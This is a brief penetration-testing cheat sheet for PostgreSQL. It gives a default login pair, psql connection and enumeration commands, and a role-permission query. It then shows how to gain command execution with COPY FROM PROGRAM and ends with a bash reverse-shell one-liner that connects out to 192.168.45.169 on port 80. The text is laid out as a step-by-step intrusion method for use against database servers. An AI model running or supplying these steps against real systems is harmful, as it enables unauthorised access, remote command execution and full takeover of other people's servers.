Postgresql | Port 5432,5433

| Some basic methodologies to enumearte postgresql.

Default User and pass for postgresql

1. postgres:postgers

Connect with the postgresql

psql -h $host -p $PORT -U $UserName

connecting with specific database

psql -h $host -p $port <database>

Replace host,port,username,passowrd and databasename with your enumearted/found information.

Enumeartion after connection

List databases

\list

connect with a database from the list

\c <database>

listing tables in the selected databases

\dt

Check user roles

\du

After access

Check permissions

#Get users roles
SELECT 
      r.rolname, 
      r.rolsuper, 
      r.rolinherit,
      r.rolcreaterole,
      r.rolcreatedb,
      r.rolcanlogin,
      r.rolconnlimit, r.rolvaliduntil,
  ARRAY(SELECT b.rolname
        FROM pg_catalog.pg_auth_members m
        JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
        WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;

If you have execution permission then execute commands to get reverse shell.

Check if you can execute spmething

CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'id';
SELECT * FROM shell;

Execute it one by one and if it is successful then use below command to get reverse shell..

COPY shell FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/192.168.45.169/80 0>&1"';

📚 References

If you want to lean about more commands these are the good references

hasura.io - Quick Commands
neon.com - Important commands
geeksforgeeks -To lean on psql commands
postgresql - Officil guide for psql

Default User and pass for postgresql​

1. postgres:postgers​

Connect with the postgresql​

connecting with specific database​

Enumeartion after connection​

After access​

Check if you can execute spmething​

📚 References​